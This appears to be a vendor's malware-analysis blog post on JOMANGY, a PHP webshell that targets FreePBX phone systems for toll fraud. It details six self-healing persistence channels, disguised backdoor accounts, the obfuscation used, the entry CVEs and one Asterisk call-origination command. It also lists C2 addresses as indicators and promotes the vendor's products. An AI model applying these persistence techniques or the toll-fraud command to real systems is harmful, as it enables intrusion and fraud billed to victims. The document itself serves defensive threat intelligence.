JOMANGY Malware Analysis, Overview by ANY.RUN

Inside JOMANGY: A Resilient FreePBX Malware Built to Survive Cleanup Attempts

Key Takeaways

JOMANGY is a newly documented PHP webshell first described in May 2026, developed by the financially motivated threat actor INJ3CTOR3, and targeting FreePBX-based VoIP phone systems with the explicit goal of generating toll fraud revenue.
Six self-reinforcing persistence channels make JOMANGY extraordinarily difficult to remove — any single surviving channel rebuilds the full infection within minutes, rendering partial remediation useless.
18 hidden backdoor accounts (nine with full root-level privileges) are planted on every infected host, with account names deliberately mimicking legitimate FreePBX system accounts to evade manual audits.
Double-layer obfuscation (Base64 over ROT13) combined with active payload rotation gives JOMANGY near-zero antivirus detection rates at the time of initial deployment, making signature-based defenses unreliable for initial detection.
The financial risk is direct and immediate. JOMANGY's embedded toll fraud code uses the victim's own SIP trunks to generate call charges that are billed straight to the organization, with losses potentially reaching tens of thousands of dollars before the fraud is discovered.
Patch cadence is a critical gap. With hundreds of systems from the January 2026 campaign still infected five months later, organizations must treat FreePBX vulnerability patching as an urgent priority and never expose the admin panel directly to the internet.
Proactive threat intelligence is essential against rapidly evolving campaigns. Use ANY.RUN Threat Intelligence Lookup to instantly check your environment for known JOMANGY IOCs, C2 addresses, and campaign artifacts, and subscribe to ANY.RUN Threat Intelligence Feeds to automatically push fresh, machine-readable JOMANGY indicators into your SIEM, firewall, and EDR — staying ahead of the attacker's infrastructure rotation before it costs you.

destinationIP:"160.119.69.4".

IP linked to JOMANGY in TI Lookup

What is JOMANGY?

JOMANGY is a PHP webshell family first identified and publicly documented in May 2026 by Cyble Research & Intelligence Labs (CRIL). It was deployed as part of an active campaign against internet-exposed FreePBX servers, the widely used open-source PBX (Private Branch Exchange) interface that manages Asterisk-based business phone systems.

The webshell's most defining characteristic is its self-healing architecture. Rather than relying on a single method of persistence, JOMANGY establishes six independent channels that protect and restore each other. If an administrator removes one component, the remaining channels automatically rebuild the full infection, typically within minutes. This design makes partial remediation functionally useless.

Beyond persistence, JOMANGY carries live toll fraud code embedded directly into every deployed instance. This code is capable of initiating outbound phone calls through the victim's own SIP trunks, routing them to premium-rate numbers controlled by the attacker. The victim's carrier then bills the victim for all those calls — sometimes accumulating thousands of dollars in fraudulent charges before the fraud is even detected.

JOMANGY is deployed alongside ZenharR, another webshell previously attributed to the INJ3CTOR3 actor lineage, and a component called license.php — a privileged PHP executor embedded into FreePBX's high-availability infrastructure that operates without authentication controls.

Every JOMANGY sample recovered during analysis carries the same hardcoded watermark string — trace_e1ebf9066a951be519a24140711839ea — tying all known instances back to a single development source and confirming the campaign's centralized origin.

ANY.RUN Interactive Sandbox lets analysts investigate JOMANGY behavior in real time, validate detection coverage, and observe webshell deployment, persistence mechanisms, and outbound C2 activity.

View analysis

JOMANGY detonated in Interactive Sandbox_

MITRE ATT&CK techniques observed include:

𝗣𝗲𝗿𝘀𝗶𝘀𝘁𝗲𝗻𝗰𝗲 via Cron jobs and Unix shell configuration abuse;
𝗗𝗲𝗳𝗲𝗻𝘀𝗲 𝗲𝘃𝗮𝘀𝗶𝗼𝗻 through log clearing, timestomping, and firewall modification;
𝗖𝗿𝗲𝗱𝗲𝗻𝘁𝗶𝗮𝗹 𝗮𝗰𝗰𝗲𝘀𝘀 targeting /etc/passwd and /etc/shadow;
𝗖𝗼𝗺𝗽𝗲𝘁𝗶𝘁𝗶𝘃𝗲 𝗲𝘃𝗶𝗰𝘁𝗶𝗼𝗻 of other webshells from compromised systems;
𝗩𝗼𝗜𝗣/𝗦𝗜𝗣 𝗮𝗯𝘂𝘀𝗲 supporting toll fraud operations.

MITRE ATT&CK techniques observed in JOMANGY

The execution chain follows the sequence:

Vulnerable FreePBX instance;
Exploit public vulnerabilities;
Bash stager deployment;
JOMANGY webshell deployment;
Multiple persistence mechanisms;
Self-healing loop;
VoIP/SIP abuse.

The Sandbox completes a malware sample analysis with actionable Tier 1 report including an AI summary and AI recommendations on detection and containment.

Tier 1 report abstract Tier 1 report (abstract)

How JOMANGY Threatens Businesses and Organizations

JOMANGY presents several distinct and compounding threats to any organization running FreePBX infrastructure:

Financial harm through toll fraud. By routing calls through compromised SIP trunks to international premium-rate numbers (a scheme known as International Revenue Share Fraud (IRSF)) attackers generate revenue while the victim receives the bill from their telecom carrier.

Persistent, near-unremovable system compromise. JOMANGY's six-layer persistence model means that cleaning an infection is not a matter of deleting a few files. As documented by researchers, even 700 of the systems compromised in the January 2026 campaign wave remained infected five months after public disclosure, despite patches being available.

Complete administrative control. The 18 backdoor accounts planted by JOMANGY (nine of them with root-equivalent (UID-0) privileges) give attackers persistent, privileged access to the underlying OS. Account names are deliberately disguised to blend into the legitimate account inventory (e.g., asterisk, freepbxuser, spamfilter), making manual detection extremely difficult without specialized tooling.

Competitive territorial control. JOMANGY's dropper actively removes over 50 competing webshell signatures and blocks 11 rival C2 IP addresses, ensuring that the compromised system becomes the exclusive property of INJ3CTOR3. This behavior reflects the professionalization of the VoIP fraud underground, where compromised PBX access is a commodity with real market value.

Near-zero AV detection at deployment. Because the attacker actively rotates the payload contents using double-layer obfuscation (Base64 over ROT13), JOMANGY typically achieves near-zero detection rates across major antivirus engines at the time of initial deployment, giving the attack a wide window of opportunity before defenses catch up.

Use ANY.RUN free for 14 days

Try the full power of interactive analysis

Start your free trial

Victimology: Who Is Most Vulnerable?

JOMANGY primarily targets organizations operating internet-facing FreePBX infrastructure.

Most Vulnerable Sectors Industries threatened by JOMANGY

The attacker's C2-hosted reconnaissance inventory of 3,080 IP addresses, approximately 39% of which pointed to Alibaba Cloud infrastructure, indicates a globally distributed, opportunistic campaign targeting organizations across the Asia-Pacific region, Latin America, and the Middle East, as well as Europe and North America.

Any organization that has not recently audited its FreePBX version, restricted web panel access, or reviewed its SIP trunk usage for anomalies should treat this as an urgent action item.

How JOMANGY Gets Into Systems and Spreads

JOMANGY gains initial access by exploiting vulnerabilities in FreePBX's web management interface. Researchers identified two candidate CVEs as likely entry points for the 2026 campaign:

CVE-2025-64328 — A post-authentication command injection vulnerability in the FreePBX Endpoint Manager's administrative interface, previously exploited in the January 2026 EncystPHP campaign.
CVE-2025-57819 — A pre-authentication SQL injection vulnerability in the FreePBX Endpoint module via cron jobs, with a public proof-of-concept from WatchTowr Labs whose artifacts the JOMANGY dropper explicitly attempts to clean up.

Once initial access is achieved, a multi-stage Bash dropper is deployed to the host. The dropper performs the following sequence:

Evicts over 50 competing webshell signatures and blocks 11 rival C2 IP addresses via firewall rules, eliminating competition and monopolizing the host.
Deletes all artifacts from INJ3CTOR3's own prior January 2026 campaign, migrating the active botnet to new infrastructure cleanly.
Drops the JOMANGY webshell across multiple locations in the FreePBX web root — more than 12 distinct file paths — many protected with chattr +i to make them immutable even to root.
Deploys ZenharR alongside JOMANGY for additional remote command execution capability.
Plants 18 backdoor accounts (nine UID-0, eight service-tier, one MySQL-injected FreePBX panel account).
Establishes six independent persistence channels.
Connects to the C2 server to report the new infection and begin receiving toll fraud instructions.

The malware also replicates JOMANGY into 15 additional locations within the web root as part of its propagation logic, ensuring maximum redundancy. The C2 server hosts a file called people2.txt containing 3,080 target IP addresses, representing the automated reconnaissance output used to feed new exploitation attempts.

How Does JOMANGY Malware Function?

JOMANGY's operation can be broken into three functional domains: evasion, persistence, and monetization.

Evasion

Every JOMANGY sample uses double-layer obfuscation. An outer Base64 encoding wraps a PHP string, which when decoded applies the ROT13 cipher to a second encoded layer before executing the result on the server. The threat actor actively rotates the payload contents between deployments, which produces distinct file hashes across samples and ensures near-zero antivirus detection rates at the time of initial deployment. The consistent internal watermark (trace_e1ebf9066a951be519a24140711839ea) is the forensic thread linking all variants to a common source despite the hash diversity.

Persistence (Six Independent Channels)

The six persistence mechanisms are designed so that any single surviving channel can fully rebuild the infection:

Cron-based C2 polling — A cron job polls the attacker's C2 server every one to three minutes, ready to receive new commands or re-download components.
Shell profile injection — Malicious code is injected into shell profile files, firing whenever root logs in or the system reboots.
Immutable crontab backups — Eight crontab backup copies are protected with chattr +i (making them undeletable without removing the immutable flag first), monitored by two dedicated restore cron loops that continuously verify and repair the others.
Process watchdog — A dedicated watchdog process monitors for the absence of the beacon process and immediately re-downloads the dropper if it disappears.
Immutable webshell copies — JOMANGY is replicated across more than twelve web root paths, many locked immutable, so that a single HTTP request to any surviving copy rebuilds the full infection stack.
Self-reinstalling PHP executor (license.php) — A PHP executor embedded within FreePBX's high-availability (HA) module provides privileged command execution independently of all other channels. It contains no authentication controls and relies on remotely supplied format-string placeholders before activation — making it a particularly dangerous backstop.

Monetization (Toll Fraud)

Every deployed JOMANGY instance carries active VoIP toll fraud code. Attackers use Asterisk CLI commands — such as asterisk -rx "channel originate Local/@" — to initiate outbound calls through the victim's own SIP trunks. These calls are routed to international premium-rate numbers (IPRNs) controlled by the attacker. The victim's telecom carrier charges the victim's account for all generated call volume. This method generates revenue with minimal operational overhead and leaves no ransomware artifacts for incident responders to follow.

How Businesses Can Use ANY.RUN’s Threat Intelligence Feeds and TI Lookup Against JOMANGY

Understanding a threat is only half the battle: organizations need actionable intelligence to defend against it proactively. ANY.RUN's Threat Intelligence Feeds and Threat Intelligence Lookup are purpose-built for exactly this kind of defense.

ANY.RUN Threat Intelligence Feeds deliver a continuously refreshed stream of high-confidence, machine-readable IOCs in formats compatible with SIEMs, firewalls, EDR platforms, and SOAR playbooks.

For a campaign like JOMANGY, where the attacker actively rotates payload hashes and migrates C2 infrastructure, having a real-time feed that captures fresh indicators as the campaign evolves is critical. Security teams can automatically block newly identified JOMANGY C2 addresses, flag access attempts to known malicious paths in the FreePBX web root, and alert on behavioral indicators such as the characteristic cron injection patterns used by the malware.

TI Feeds benefits and integration

ANY.RUN Threat Intelligence Lookup allows security teams to instantly query a continuously updated threat intelligence database for indicators of compromise (IOCs) directly associated with JOMANGY and the broader INJ3CTOR3 campaign.

Security analysts can search for known malicious IP addresses (including the 3,080-entry target inventory hosted on JOMANGY's C2), file hashes of JOMANGY and ZenharR samples, the campaign's unique watermark string (trace_e1ebf9066a951be519a24140711839ea), suspicious file paths dropped during infection, and known C2 domain and infrastructure details.

TI Lookup reveals two active JOMANGY infrastructure clusters tied to attacker-controlled C2 servers, with activity traced back to April 2026. This visibility helps threat hunters uncover related activity, identify compromised environments, and track infrastructure reuse across campaigns:

destinationIP:"160.119.69.4" OR destinationIP:"45.95.147.178".

JOMANGY infrastructure in TI Lookup

Organizations should also:

Patch FreePBX systems promptly;
Restrict internet exposure of management interfaces;
Monitor SIP activity for unusual call patterns;
Enable multi-factor authentication;
Audit privileged accounts regularly;
Monitor cron jobs and startup scripts;
Use EDR and server monitoring solutions;
Segment VoIP infrastructure from business-critical systems;
Rebuild compromised systems from clean images when infection is confirmed.

Researchers emphasize that partial cleanup may be ineffective due to JOMANGY's self-healing capabilities.

Integrate ANY.RUN’s threat intelligence solutions in your company

Conclusion

JOMANGY represents a sophisticated evolution of VoIP-focused malware. While its primary objective is financial gain through toll fraud, its extensive persistence mechanisms, hidden accounts, and self-healing architecture make it a serious threat to organizations relying on FreePBX infrastructure.

For defenders, rapid visibility into malicious infrastructure, continuous threat intelligence, and proactive hunting are critical for detecting attacks before they result in substantial financial losses or long-term compromise. Combining strong patch management with threat intelligence-driven monitoring can significantly reduce exposure to emerging threats such as JOMANGY.

Trial TI Lookup to start gathering actionable threat intelligence on the malware that threatens your business sector and region: just sign up to ANY.RUN.